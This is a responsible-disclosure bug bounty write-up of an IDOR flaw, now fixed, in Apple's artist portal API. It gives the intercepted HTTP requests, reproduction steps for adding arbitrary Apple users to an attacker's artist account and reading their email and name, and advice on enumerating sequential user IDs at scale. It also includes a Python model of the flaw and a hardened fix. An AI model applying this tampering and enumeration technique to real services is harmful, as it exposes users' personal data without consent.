PII Disclosure of All Apple Accounts and Unauthorised Addition of an Artist Account to Any Victim's Apple ID Account [IDOR]
Apple Inc. is an American multinational technology company headquartered in Cupertino, California. As of March 2023, Apple is the world's biggest company by market capitalization, and with US$394.3 billion the largest technology company by 2022 revenue.
Technical Details of the Bug:
# Impact
1. PII disclosure of Apple users at scale.
2. Adding an artist account to any Apple user's ID remotely.
3. Adding any Apple ID user as a member of your artist account.
# Affected Service
## Description of the issue
In an Artist account you can add any user as a member of your account. Membership changes go through an API request that edits the current user.
If you change the Apple user ID in that request to any other user ID on Apple, the associated account is added directly to your artist account.
Once the user is added to your account you can view their PII, such as email address, first name and last name.
I am mentioning the technical details below.
# Original HTTP Request to Edit the Current User
```
PUT /api/profiles/artists/
Host: artists.apple.com
Cookie: [Cookies]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://artists.apple.com/a/
X-Requesting-App: Apple Music Artists Web v2
X-Requested-By: 1058da2bea47cd57ffc64d4adcb079
Content-Type: application/x-www-form-
Origin: https://artists.apple.com
Content-Length: 203
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
email=&relationship=manager&
```
Two changes are needed for the attack to succeed:
1. Change the Apple_User_ID to any user ID on Apple.
2. Change the request method to POST.
# Vulnerable HTTP Request
```
POST /api/profiles/artists/
Host: artists.apple.com
Cookie: [Cookies]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://artists.apple.com/a/
X-Requesting-App: Apple Music Artists Web v2
X-Requested-By: 1058da2bea47cd57ffc64d4adcb079
Content-Type: application/x-www-form-
Origin: https://artists.apple.com
Content-Length: 203
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
email=&relationship=manager&
```
## Mass Attack
Because the Apple user ID is a numeric, incrementing value, an attacker can easily enumerate it to collect PII for a large number of Apple users.
## Steps to reproduce
For this attack the attacker needs a working Artist account.
1. Log in to https://artists.apple.com from the attacker account.
2. Select your artist and go to the Manage section.
3. Here you can add new users.
4. Add a test user and verify the test account.
5. The test account is now a member of your artist account.
6. From the attacker account, edit the test user in the Users section of Manage.
7. Save the user and intercept the request in a proxy tool such as Burp Suite.
8. You will notice that the request looks like the first request shown above (the original request).
9. Change the Apple_User_ID value to any Apple user ID (the victim's user ID) and change the request method from "PUT" to "POST".
10. Send the request to the server and you will notice that the victim user is added to your account.
11. This also discloses the PII of the victim account, such as email address, first name and last name.
12. If you now log in from the victim account, you will see the attacker's artist added to the victim account.
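As an added illustration (not code from the report, and not Apple's implementation), the following Python models the two conditions described above, an authorization check that exists only on the PUT edit path and a client-supplied user ID that is trusted as-is, beside a hardened handler that verifies the caller's ownership on every method, links only users who have accepted an invitation, and returns no profile data. The server logic, names and sample data are assumptions.

```python
def fresh_state():
    """Constructed sample state: artist 'artist-1' is owned by user 1001."""
    return {
        "owners": {"artist-1": 1001},
        "members": {"artist-1": {1001}},
        "profiles": {
            1001: {"email": "alice@example.test", "first": "Alice", "last": "A"},
            2002: {"email": "bob@example.test", "first": "Bob", "last": "B"},
            3003: {"email": "carol@example.test", "first": "Carol", "last": "C"},
        },
        # (artist_id, user_id) pairs where the target user accepted an invitation
        "accepted_invites": {("artist-1", 3003)},
    }


def weak_set_member(state, method, caller_id, artist_id, target_id, relationship):
    """Assumed weak pattern: only the PUT path checks the target is a member."""
    members = state["members"].setdefault(artist_id, set())
    if method == "PUT" and target_id not in members:
        return 403, None
    # POST falls through: any target_id is linked and its profile is returned.
    members.add(target_id)
    return 200, dict(state["profiles"][target_id], relationship=relationship)


def hardened_set_member(state, method, caller_id, artist_id, target_id, relationship):
    """Hardened pattern: method-independent authorization plus user consent."""
    if method not in ("PUT", "POST"):
        return 405, None
    # 1. The caller must own (manage) this artist profile, whatever the method.
    if state["owners"].get(artist_id) != caller_id:
        return 403, None
    members = state["members"].setdefault(artist_id, set())
    # 2. A new member is linked only if that user accepted an invitation.
    if target_id not in members and (artist_id, target_id) not in state["accepted_invites"]:
        return 403, None
    members.add(target_id)
    state["accepted_invites"].discard((artist_id, target_id))
    # 3. Respond with the relationship record only, never the user's profile.
    return 200, {"user_id": target_id, "relationship": relationship}


if __name__ == "__main__":
    s = fresh_state()
    print(weak_set_member(s, "POST", 1001, "artist-1", 2002, "manager"))      # leaks Bob's profile
    s = fresh_state()
    print(hardened_set_member(s, "POST", 1001, "artist-1", 2002, "manager"))  # (403, None)
    print(hardened_set_member(s, "POST", 1001, "artist-1", 3003, "manager"))  # (200, {...})
```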
# Video POC
I am providing a video POC for this. I have created a password-protected Vimeo video for this issue.
Link : https://vimeo.com/634650310
Password : appleprivatepoc007@
Timeline:
Oct 18th 2021: Report sent to the Apple Product Security Team by email.
Oct 19th 2021: Report accepted and triaged.
Nov 11th 2021: Issue fully resolved and confirmed.
Jan 29th 2022: $6500 bounty awarded.